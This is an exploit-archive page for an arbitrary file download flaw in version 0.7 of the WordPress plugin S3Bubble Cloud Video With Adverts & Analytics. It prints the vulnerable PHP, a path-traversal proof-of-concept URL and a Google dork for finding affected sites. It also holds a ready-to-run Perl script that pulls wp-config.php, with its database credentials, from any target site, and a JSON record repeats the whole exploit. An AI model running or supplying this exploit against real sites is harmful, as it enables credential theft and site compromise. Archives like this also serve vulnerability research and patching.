Search...

WordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download

2015-07-05T00:00:00

ID EXPLOITPACK:49F47E1DE6448F19723FA0076205BDE3
Type exploitpack
Reporter CrashBandicot
Modified 2015-07-05T00:00:00

Description

WordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download

                                        
                                            # Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Date: 04/07/2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://s3bubble.com
# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Version: 0.7
# Tested on: MSWin32

#EDB note: updated Software link to correct plugin.

# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php

&lt;?php 
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=". $_GET['name']);
   $path = urldecode($_GET['path']);
   if(isset($path))readfile($path);
?&gt;


# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php


# Exploit : 


#!/usr/bin/perl

use LWP::UserAgent;
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
if(@ARGV &lt; 2)
{
die("\n\n[+] usage : perl $0 site.com /path/");
}

print q{
       Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
                           -&gt;CrashBandicot
 
 
};

($Target,$path) = @ARGV;

if($Target !~ /^(http|https):\/\//)
{
$Target = "http://$Target";
}

$xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
my $url = $Target.$path.$xpl;
print "\n [?] Exploiting ...... \n\n";
 
$ua = LWP::UserAgent-&gt;new(ssl_opts =&gt; { verify_hostname =&gt; 0 });
$req = $ua-&gt;get($url,":content_file" =&gt; "wp-config.php");
 
if ($req-&gt;is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] File save to name : wp-config.php\n";
}
else
{
die("[!] Exploit Failed !\n");
}

_END_

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:08", "references": [], "description": "\nWordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download", "edition": 1, "reporter": "CrashBandicot", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2015-07-05T00:00:00", "title": "WordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:05:08", "rev": 2}, "score": {"value": -0.5, "vector": "NONE", "modified": "2020-04-01T19:05:08", "rev": 2}, "vulnersScore": -0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-07-05T00:00:00", "id": "EXPLOITPACK:49F47E1DE6448F19723FA0076205BDE3", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download\n# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/\n# Date: 04/07/2015\n# Exploit Author: CrashBandicot @DosPerl\n# Vendor Homepage: https://s3bubble.com\n# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/\n# Version: 0.7\n# Tested on: MSWin32\n\n#EDB note: updated Software link to correct plugin.\n\n# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php\n\n<?php \n header(\"Content-Type: application/octet-stream\");\n header(\"Content-Disposition: attachment; filename=\". $_GET['name']);\n $path = urldecode($_GET['path']);\n if(isset($path))readfile($path);\n?>\n\n\n# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php\n\n\n# Exploit : \n\n\n#!/usr/bin/perl\n\nuse LWP::UserAgent;\n \nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear');\n \nif(@ARGV < 2)\n{\ndie(\"\\n\\n[+] usage : perl $0 site.com /path/\");\n}\n\nprint q{\n Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download\n ->CrashBandicot\n \n \n};\n\n($Target,$path) = @ARGV;\n\nif($Target !~ /^(http|https):\\/\\//)\n{\n$Target = \"http://$Target\";\n}\n\n$xpl = \"/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php\";\nmy $url = $Target.$path.$xpl;\nprint \"\\n [?] Exploiting ...... \\n\\n\";\n \n$ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });\n$req = $ua->get($url,\":content_file\" => \"wp-config.php\");\n \nif ($req->is_success)\n{\nprint \"[+] $url Exploited!\\n\\n\";\nprint \"[+] File save to name : wp-config.php\\n\";\n}\nelse\n{\ndie(\"[!] Exploit Failed !\\n\");\n}\n\n_END_", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}